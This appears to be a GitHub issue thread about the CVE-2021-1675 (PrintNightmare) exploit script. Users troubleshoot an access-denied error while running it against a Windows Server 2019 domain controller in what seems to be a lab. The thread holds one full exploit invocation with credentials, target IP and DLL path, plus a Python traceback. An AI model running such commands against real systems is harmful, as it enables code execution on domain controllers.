cube0x0
commented
3 years ago Most likely due to your SMB permission
Closed lnaphade closed 3 years ago
cube0x0
commented
3 years ago Most likely due to your SMB permission
SumenjakZiga
commented
3 years ago Hey cube, I created a shared directory as you specified in your readme.md on my windows 7 VM. I have access to it from my kali as anonymous. I'm attacking a 2019 server VM with may updates, which also has anonymous access to the share. Both win7 and 2019 server are in same domain. What permissions could I change here?
SumenjakZiga
commented
3 years ago Never mind, I'm using ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' and it works perfectly. nice work! :D
MortalAndTry
commented
3 years ago Never mind, I'm using
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'and it works perfectly. nice work! :D
'C:\addCube.dll' is a local file at 2019 server(domain control server),so it's not a success
Traceback (most recent call last): File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 117, in
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied